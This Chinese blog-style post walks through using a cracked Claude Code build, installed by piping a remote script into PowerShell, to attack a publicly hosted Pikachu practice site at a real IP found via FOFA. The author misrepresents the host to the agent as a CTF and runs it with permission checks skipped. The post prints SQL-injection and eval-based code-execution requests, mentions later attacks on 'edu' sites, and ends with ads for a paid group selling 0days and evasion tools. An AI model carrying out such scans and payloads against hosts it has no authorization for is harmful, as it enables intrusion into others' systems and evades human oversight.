由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号陌笙不太懂安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!
简单使用AI进行渗透测试尝试环境配置
我这里使用的是claude+ mimo-v2-pro
claude
Claude Code 是一个代理编码工具,可以读取你的代码库、编辑文件、运行命令,并与你的开发工具集成。可在终端、IDE、桌面应用和浏览器中使用。
mimo-v2-pro
MiMo-V2-Pro是小米2026年3月发布的旗舰大模型,以1M超长上下文和极高性价比主打高强度AI智能体任务。
claude安装
有很多种安装方法,我这里以windows命令行安装为例,安装这个claude的破解版clawgod
https://github.com/0Chencc/clawgod

管理员运行powershell执行这条命令即可成功安装
irm https://github.com/0Chencc/clawgod/releases/latest/download/install.ps1 | iex
如果下载太慢,可以把这个文件下载下来使用iex执行

安装完成之后,建一个文件夹,右键打开cmd,输入claude ,看到这个绿色的机器人就是安装成功了。

如果没安装成功可以自行百度一手,网上有很多教程的。
模型配置
最近有这个小米百亿token计划
https://100t.xiaomimimo.com/


填入项目信息邮箱地址等,即可获得一个月的免费体验计划


548RHN


在这里输入我们的配置信息


点击添加即可使用
回到claude 这里启用一下

配置好之后来到,命令行询问一下,你是哪个模型,成功回复。

本次使用公网靶场测试
打开fofa
https://fofa.info/

语法
body="Pikachu 漏洞练习平台"
可以看到有很多师傅搭建好的
我们直接选一个进行测试
http://47.109.194.26/
claude --dangerously-skip-permissions
这是一个ctf项目,http://47.109.194.26/,里面可能存在漏洞,你帮我测试一下,如果存在漏洞我需要请求包和响应包用来验证,并且需要完整的通过wp。



等待几分钟之后,成功打完了,我们去看一下,wp,通过右边的侧边栏可以看到基本打的差不多了。

看看具体内容
poc和响应都给的出来,我用yakit简单复现几个

POST /vul/sqli/sqli_id.php HTTP/1.1Host: 47.109.194.26Content-Type: application/x-www-form-urlencodedid=0 union select database(),version()--&submit=%E6%9F%A5%E8%AF%A2


命令执行
POST /vul/rce/rce_eval.php HTTP/1.1Host: 47.109.194.26Content-Type: application/x-www-form-urlencodedtxt=phpinfo();&submit=%E6%8F%90%E4%BA%A4

回到模型处看看,花了2%,还ok

且没有调用任何一个skIll

后续试了几个edu,效果也凑活,就是有点费token.......
后台回复加群加入交流群
广告:cisp pte/pts &nisp1级2级低价报考
陌笙安全纷传圈子+陌笙src挖掘知识库+陌笙安全漏洞库+陌笙安全面试题库简单介绍(加入纷传圈子送知识库+漏洞库+面试题库)
如果觉得合适可以加入,圈子目前价格39.9元,价格只会根据圈子内容和圈子人数进行上调,不会下跌。。。
圈子福利
edu漏洞挖掘1v1指导出洞



POC库&&更新适配afrog&&nuclei&&dddd的POC&1day/Nday等&&dddd二开工具[助力渗透测试&&红蓝攻防]
工具截图

实战效果

poc库【后续持续更新】


陌笙src挖掘知识库介绍(内容持续更新中!!!)
信息收集(主域名信息收集,子域名信息收集等&会永久提供fofa-key助力)弱口令漏洞&未授权访问漏洞挖掘任意文件读取&删除&下载&上传漏洞sql注入漏洞url重定向漏洞csrf&ssrf漏洞挖掘XSS&XXE漏洞挖掘等等常见漏洞cors&目录遍历&越权漏洞挖掘EDUSRC(证书站挖掘案例分享&edusrc挖掘技巧分享)CNVD挖掘技巧分享&实战案例报告编写公益漏洞挖掘(公益src挖掘漏洞分享&提供补天1权重资产)SRC挖掘实战(针对各种常见功能总结的常见测试思路等快速提升)经典常见Nday漏洞(常见中间件&以及各种常见框架)复现云安全相关漏洞挖掘(云key扫盲&云存储桶&快速识别云环境&云攻防)AI相关学习(AI基础&AI代码审计实战测试&webLLM攻击等)APP&小程序漏洞挖掘等各模块不在一一介绍
信息收集

src挖掘基础

src挖掘实战

edusrc


经典nday复现

云安全&AI安全


陌笙安全漏洞库介绍
最新漏洞查看1day&0day分享EDU学校相关漏洞Web应用漏洞CMS漏洞OA产品漏洞中间件漏洞云安全漏洞人工智能漏洞其他漏洞



陌笙安全面试库
渗透测试基本问题一汇总渗透测试基本问题二汇总渗透测试基本问题三汇总微步护网面试题目长亭科技面试深信服护网面试启明星辰渗透测试面试题目安恒面试题目360面试奇安信护网面试运维面试题目运维面试题库网安面试相关文档大全相关面试文章推荐等等

陌笙纷传圈子介绍
1、src挖掘思维导图,信息收集思维导图,edusrc挖掘思维导图,以及后续的红队&面试思维导图&自己网安笔记等持续更新2、2025-2026的edusrc实战报告包含证书站和非证书站以及2025之前的各种优质报思路分享3、各种src报告思路分享(内部&外部)4、分享各种src挖掘&edusrc挖掘培训资料&视频5、不定期分享通杀、0day6、有圈子群可以技术交流以及不定期抽取证书&免费rank7.分享各种护网资料各家安全厂商讲解视频&精选实战面试题目8、各种框架漏洞技巧分享9、各种源码分享(泛微、正方系统、用友等)10、漏洞挖掘工具&信息收集工具&内网渗透免杀等网安工具分享11、各种ctf资料以及题目分享12、cnvd挖掘技巧&CNVD资产&src资产分享&补天1权重资产分享&fofakey共用13、免杀、逆向、红队攻内网防渗透等课程分享14、漏洞库&字典以各种内容不在一一说明15、cisp-pte/pts&nisp一级&nisp二级&edusrc证书内部价格15、如果有漏洞挖掘问题或者工具资料需求可以找群主(尽量满足)


目前700多条内容,扫描下方二维码查看详情以及加入圈子,持续更新中。。
如果觉得合适可以加入,价格不定期会根据圈子内容和圈子人数进行上调。。

夜雨聆风